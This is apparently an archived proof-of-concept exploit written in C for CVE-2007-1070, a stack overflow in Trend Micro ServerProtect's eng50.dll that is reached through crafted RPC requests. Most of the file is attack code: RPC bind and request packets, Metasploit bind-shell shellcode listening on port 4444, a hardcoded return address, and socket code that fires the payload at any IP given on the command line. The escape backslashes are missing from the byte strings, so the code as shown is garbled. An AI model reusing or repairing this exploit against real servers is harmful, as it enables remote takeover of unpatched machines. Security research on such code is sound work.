Home / os / win2k

trendmicro-overflow.txt

Posted on 06 September 2007

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Trend Micro ServerProtect eng50.dll Stack Overflow * [CVE-2007-1070] * * * Description: * A boundary error within a function in eng50.dll can be * exploited to cause a stack-based buffer overflow via a * specially crafted RPC request to the SpntSvc.exe service. * * Hotfix/Patch: * http://www.trendmicro.com/download/product.asp?productid=17 * * Vulnerable systems: * ServerProtect for Windows 5.58 * ServerProtect for EMC 5.58 * ServerProtect for Network Appliance Filer 5.61 * ServerProtect for Network Appliance Filer 5.62 * * Tested on: * Microsoft Windows 2000 SP4 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 TippingPoint for technical details. Had this made few days after * disclosure (few months back), was rlsd on r1918 about a week ago * and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW * I WAS THIS HOT DAYUM * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32.lib" ) /* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */ unsigned char uszDceBind[] = "x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00" "xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00" "x88x88x28x25x5BxBDxD1x11x9Dx53x00x80xC8x3Ax5Cx2C" "x01x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00" "x2Bx10x48x60x02x00x00x00"; /* rpc_opnum_0 */ unsigned char uszDceCall[] = "x05x00x00x83x10x00x00x00x08x08x00x00x01x00x00x00" "xE0x07x00x00x00x00x00x00x88x88x28x25x5BxBDxD1x11" "x9Dx53x00x80xC8x3Ax5Cx2Cx04x00x03x00xD0x07x00x00"; /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab" "x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2" "x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca" "x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56" "x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37" "x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe" "x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde" "x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04" "xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19" "x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8" "xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81" "xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba" "x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f" "x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d" "x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04" "xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb" "x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90" "x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96" "x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02" "xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85" "x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d" "x7dxe0xa6xd2xabx1f"; void usage( ) { printf(" Trend Micro ServerProtect Stack Overflow " " (c) 2007 devcode " "usage: tmicro.exe <ip> <port> "); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[512]; unsigned char uszPacket[2056]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock "); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket "); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s ", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot connect to server "); closesocket( sConnect ); return -1; } printf("[+] Sending DCE Bind packet... "); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send "); closesocket( sConnect ); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { printf("[-] Recv failed "); closesocket( sConnect ); return -1; } memset( uszPacket, 0x41, sizeof( uszPacket ) ); memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) ); memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 ); /* call ebx, 0x6574131C, TmRpcSrv.dll */ /* jmp ebx, 0x7C4E4A66, kernel32.dll */ memcpy( uszPacket + 1198, "x1Cx13x74x65", 4 ); memcpy( uszPacket + 2048, "xD0x07x00x00xD0x07x00x00", 8 ); printf("[+] Sending DCE Request packet... "); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send "); closesocket( sConnect ); return -1; } printf("[+] Check shell on port 4444 :) "); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; }

 

TOP